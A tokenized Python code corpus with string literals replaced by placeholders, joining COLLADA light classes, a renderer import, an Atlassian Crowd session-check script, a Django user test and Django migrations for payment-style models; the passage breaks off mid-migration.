numpy . float32 ) <EOL> self . color = color <EOL> """<STR_LIT>""" <EOL> self . constant_att = constant_att <EOL> """<STR_LIT>""" <EOL> self . linear_att = linear_att <EOL> """<STR_LIT>""" <EOL> self . quad_att = quad_att <EOL> """<STR_LIT>""" <EOL> self . zfar = zfar <EOL> """<STR_LIT>""" <EOL> if xmlnode != None : <EOL> self . xmlnode = xmlnode <EOL> """<STR_LIT>""" <EOL> else : <EOL> pnode = E . point ( <EOL> E . color ( '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) ) <EOL> ) <EOL> if self . constant_att is not None : <EOL> pnode . append ( E . constant_attenuation ( str ( self . constant_att ) ) ) <EOL> if self . linear_att is not None : <EOL> pnode . append ( E . linear_attenuation ( str ( self . linear_att ) ) ) <EOL> if self . quad_att is not None : <EOL> pnode . append ( E . quadratic_attenuation ( str ( self . quad_att ) ) ) <EOL> if self . zfar is not None : <EOL> pnode . append ( E . zfar ( str ( self . zvar ) ) ) <EOL> self . xmlnode = E . light ( <EOL> E . technique_common ( pnode ) <EOL> , id = self . id , name = self . id ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> self . xmlnode . set ( '<STR_LIT:id>' , self . id ) <EOL> self . xmlnode . set ( '<STR_LIT:name>' , self . id ) <EOL> pnode = self . xmlnode . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> colornode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> colornode . text = '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . constant_att ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . linear_att ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . quad_att ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . zfar ) <EOL> @ staticmethod <EOL> def load ( collada , localscope , node ) : <EOL> pnode = node . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> colornode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> if colornode is None : <EOL> raise DaeIncompleteError ( '<STR_LIT>' ) <EOL> try : <EOL> color = tuple ( [ float ( v ) for v in colornode . text . split ( ) ] ) <EOL> except ValueError as ex : <EOL> raise DaeMalformedError ( '<STR_LIT>' ) <EOL> constant_att = linear_att = quad_att = zfar = None <EOL> qattnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> cattnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> lattnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> zfarnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> try : <EOL> if cattnode is not None : <EOL> constant_att = float ( cattnode . text ) <EOL> if lattnode is not None : <EOL> linear_att = float ( lattnode . text ) <EOL> if qattnode is not None : <EOL> quad_att = float ( qattnode . text ) <EOL> if zfarnode is not None : <EOL> zfar = float ( zfarnode . text ) <EOL> except ValueError as ex : <EOL> raise DaeMalformedError ( '<STR_LIT>' ) <EOL> return PointLight ( node . get ( '<STR_LIT:id>' ) , color , constant_att , linear_att , <EOL> quad_att , zfar , xmlnode = node ) <EOL> def bind ( self , matrix ) : <EOL> """<STR_LIT>""" <EOL> return BoundPointLight ( self , matrix ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . id , ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class SpotLight ( Light ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , id , color , constant_att = None , linear_att = None , <EOL> quad_att = None , falloff_ang = None , falloff_exp = None , xmlnode = None ) : <EOL> """<STR_LIT>""" <EOL> self . id = id <EOL> """<STR_LIT>""" <EOL> self . color = color <EOL> """<STR_LIT>""" <EOL> self . constant_att = constant_att <EOL> """<STR_LIT>""" <EOL> self . linear_att = linear_att <EOL> """<STR_LIT>""" <EOL> self . quad_att = quad_att <EOL> """<STR_LIT>""" <EOL> self . falloff_ang = falloff_ang <EOL> """<STR_LIT>""" <EOL> self . falloff_exp = falloff_exp <EOL> """<STR_LIT>""" <EOL> if xmlnode != None : <EOL> self . xmlnode = xmlnode <EOL> """<STR_LIT>""" <EOL> else : <EOL> pnode = E . spot ( <EOL> E . color ( '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) ) , <EOL> ) <EOL> if self . constant_att is not None : <EOL> pnode . append ( E . constant_attenuation ( str ( self . constant_att ) ) ) <EOL> if self . linear_att is not None : <EOL> pnode . append ( E . linear_attenuation ( str ( self . linear_att ) ) ) <EOL> if self . quad_att is not None : <EOL> pnode . append ( E . quadratic_attenuation ( str ( self . quad_att ) ) ) <EOL> if self . falloff_ang is not None : <EOL> pnode . append ( E . falloff_angle ( str ( self . falloff_ang ) ) ) <EOL> if self . falloff_exp is not None : <EOL> pnode . append ( E . falloff_exponent ( str ( self . falloff_exp ) ) ) <EOL> self . xmlnode = E . light ( <EOL> E . technique_common ( pnode ) <EOL> , id = self . id , name = self . id ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> self . xmlnode . set ( '<STR_LIT:id>' , self . id ) <EOL> self . xmlnode . set ( '<STR_LIT:name>' , self . id ) <EOL> pnode = self . xmlnode . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> colornode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> colornode . text = '<STR_LIT:U+0020>' . join ( map ( str , self . color ) ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . constant_att ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . linear_att ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . quad_att ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . falloff_ang ) <EOL> _correctValInNode ( pnode , '<STR_LIT>' , self . falloff_exp ) <EOL> @ staticmethod <EOL> def load ( collada , localscope , node ) : <EOL> pnode = node . find ( '<STR_LIT>' % ( tag ( '<STR_LIT>' ) , tag ( '<STR_LIT>' ) ) ) <EOL> colornode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> if colornode is None : <EOL> raise DaeIncompleteError ( '<STR_LIT>' ) <EOL> try : <EOL> color = tuple ( [ float ( v ) for v in colornode . text . split ( ) ] ) <EOL> except ValueError as ex : <EOL> raise DaeMalformedError ( '<STR_LIT>' ) <EOL> constant_att = linear_att = quad_att = falloff_ang = falloff_exp = None <EOL> cattnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> lattnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> qattnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> fangnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> fexpnode = pnode . find ( tag ( '<STR_LIT>' ) ) <EOL> try : <EOL> if cattnode is not None : <EOL> constant_att = float ( cattnode . text ) <EOL> if lattnode is not None : <EOL> linear_att = float ( lattnode . text ) <EOL> if qattnode is not None : <EOL> quad_att = float ( qattnode . text ) <EOL> if fangnode is not None : <EOL> falloff_ang = float ( fangnode . text ) <EOL> if fexpnode is not None : <EOL> falloff_exp = float ( fexpnode . text ) <EOL> except ValueError as ex : <EOL> raise DaeMalformedError ( '<STR_LIT>' ) <EOL> return SpotLight ( node . get ( '<STR_LIT:id>' ) , color , constant_att , linear_att , <EOL> quad_att , falloff_ang , falloff_exp , xmlnode = node ) <EOL> def bind ( self , matrix ) : <EOL> """<STR_LIT>""" <EOL> return BoundSpotLight ( self , matrix ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . id , ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class BoundLight ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class BoundPointLight ( BoundLight ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , plight , matrix ) : <EOL> self . position = numpy . dot ( matrix [ : <NUM_LIT:3> , : <NUM_LIT:3> ] , plight . position ) + matrix [ : <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> """<STR_LIT>""" <EOL> self . color = plight . color <EOL> """<STR_LIT>""" <EOL> self . constant_att = plight . constant_att <EOL> if self . constant_att is None : <EOL> self . constant_att = <NUM_LIT:1.0> <EOL> """<STR_LIT>""" <EOL> self . linear_att = plight . linear_att <EOL> if self . linear_att is None : <EOL> self . linear_att = <NUM_LIT:0.0> <EOL> """<STR_LIT>""" <EOL> self . quad_att = plight . quad_att <EOL> if self . quad_att is None : <EOL> self . quad_att = <NUM_LIT:0.0> <EOL> """<STR_LIT>""" <EOL> self . zfar = plight . zfar <EOL> """<STR_LIT>""" <EOL> self . original = plight <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % str ( self . original . id ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class BoundSpotLight ( BoundLight ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , slight , matrix ) : <EOL> self . position = matrix [ : <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> """<STR_LIT>""" <EOL> self . direction = - matrix [ : <NUM_LIT:3> , <NUM_LIT:2> ] <EOL> """<STR_LIT>""" <EOL> self . up = matrix [ : <NUM_LIT:3> , <NUM_LIT:1> ] <EOL> """<STR_LIT>""" <EOL> self . matrix = matrix <EOL> """<STR_LIT>""" <EOL> self . color = slight . color <EOL> """<STR_LIT>""" <EOL> self . constant_att = slight . constant_att <EOL> if self . constant_att is None : <EOL> self . constant_att = <NUM_LIT:1.0> <EOL> """<STR_LIT>""" <EOL> self . linear_att = slight . linear_att <EOL> if self . linear_att is None : <EOL> self . linear_att = <NUM_LIT:0.0> <EOL> """<STR_LIT>""" <EOL> self . quad_att = slight . quad_att <EOL> if self . quad_att is None : <EOL> self . quad_att = <NUM_LIT:0.0> <EOL> """<STR_LIT>""" <EOL> self . falloff_ang = slight . falloff_ang <EOL> if self . falloff_ang is None : <EOL> self . falloff_ang = <NUM_LIT> <EOL> """<STR_LIT>""" <EOL> self . falloff_exp = slight . falloff_exp <EOL> if self . falloff_exp is None : <EOL> self . falloff_exp = <NUM_LIT:0.0> <EOL> """<STR_LIT>""" <EOL> self . original = slight <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % str ( self . original . id ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class BoundDirectionalLight ( BoundLight ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dlight , matrix ) : <EOL> self . direction = numpy . dot ( matrix [ : <NUM_LIT:3> , : <NUM_LIT:3> ] , dlight . direction ) <EOL> """<STR_LIT>""" <EOL> self . color = dlight . color <EOL> """<STR_LIT>""" <EOL> self . original = dlight <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % str ( self . original . id ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) <EOL> class BoundAmbientLight ( BoundLight ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , alight , matrix ) : <EOL> self . color = alight . color <EOL> """<STR_LIT>""" <EOL> self . original = alight <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % str ( self . original . id ) <EOL> def __repr__ ( self ) : <EOL> return str ( self ) </s>
<s> import os <EOL> import sys <EOL> from GLSLRenderer import GLSLRenderer <EOL> from OldStyleRenderer import OldStyleRenderer </s>
<s> import crowd <EOL> import os , sys , getpass <EOL> app_url = '<STR_LIT>' <EOL> app_user = '<STR_LIT>' <EOL> app_pass = '<STR_LIT>' <EOL> cs = crowd . CrowdServer ( app_url , app_user , app_pass ) <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> username = sys . argv [ <NUM_LIT:1> ] <EOL> else : <EOL> username = os . environ [ '<STR_LIT>' ] <EOL> password = getpass . getpass ( prompt = '<STR_LIT>' % username ) <EOL> session = cs . get_session ( username , password ) <EOL> if session : <EOL> print '<STR_LIT>' % session [ '<STR_LIT>' ] <EOL> else : <EOL> print '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> success = cs . validate_session ( session [ '<STR_LIT>' ] ) <EOL> if success : <EOL> print '<STR_LIT>' <EOL> else : <EOL> print '<STR_LIT>' </s>
<s> from test_plus . test import TestCase <EOL> class TestUser ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . user = self . make_user ( ) <EOL> def test__str__ ( self ) : <EOL> self . assertEqual ( <EOL> self . user . __str__ ( ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_get_absolute_url ( self ) : <EOL> self . assertEqual ( <EOL> self . user . get_absolute_url ( ) , <EOL> '<STR_LIT>' <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> from django . conf import settings <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> migrations . swappable_dependency ( settings . AUTH_USER_MODEL ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . TextField ( blank = True , null = True ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( related_name = '<STR_LIT>' , blank = True , null = True , to = settings . AUTH_USER_MODEL ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT:status>' , <EOL> field = models . IntegerField ( default = <NUM_LIT:10> , choices = [ ( <NUM_LIT:10> , '<STR_LIT>' ) , ( <NUM_LIT:20> , '<STR_LIT>' ) , ( <NUM_LIT:30> , '<STR_LIT>' ) , ( <NUM_LIT> , '<STR_LIT>' ) ] ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( related_name = '<STR_LIT>' , blank = True , null = True , to = settings . AUTH_USER_MODEL ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import jsonfield . fields <EOL> import django . utils . timezone <EOL> from django . conf import settings <EOL> import model_utils . fields <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> migrations . swappable_dependency ( settings . AUTH_USER_MODEL ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( unique = True , max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:4> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:50> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( null = True , max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( null = True , max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT:description>' , models . TextField ( blank = True ) ) , <EOL> ( '<STR_LIT>' , models . NullBooleanField ( ) ) , <EOL> ( '<STR_LIT>' , models . NullBooleanField ( ) ) , <EOL> ( '<STR_LIT>' , models . NullBooleanField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( null = True , max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , blank = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:100> ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( ) ) , <EOL> ( '<STR_LIT:start>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT:status>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( unique = True , max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:200> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:4> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:50> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , editable = False ) ) , <EOL> ( '<STR_LIT:user>' , models . OneToOneField ( null = True , to = settings . AUTH_USER_MODEL ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( unique = True , max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , jsonfield . fields . JSONField ( default = dict ) ) , <EOL> ( '<STR_LIT>' , jsonfield . fields . JSONField ( null = True ) ) , <EOL> ( '<STR_LIT>' , models . NullBooleanField ( ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( to = '<STR_LIT>' , null = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT:data>' , models . TextField ( ) ) , <EOL> ( '<STR_LIT:message>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( to = '<STR_LIT>' , null = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , models . NullBooleanField ( ) ) , <EOL> ( '<STR_LIT>' , models . PositiveIntegerField ( null = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT:date>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:50> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:10> ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT:description>' , models . CharField ( max_length = <NUM_LIT:200> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:100> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( null = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( unique = True , max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT:100> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:10> , choices = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:10> , verbose_name = '<STR_LIT>' , choices = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( default = <NUM_LIT:1> , null = True , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( verbose_name = '<STR_LIT>' , max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( null = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( unique = True , max_length = <NUM_LIT:50> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT:status>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT:date>' , models . DateTimeField ( ) ) , <EOL> ( '<STR_LIT:description>' , models . TextField ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( ) ) , <EOL> ( '<STR_LIT>' , models . DecimalField ( max_digits = <NUM_LIT:7> , decimal_places = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( 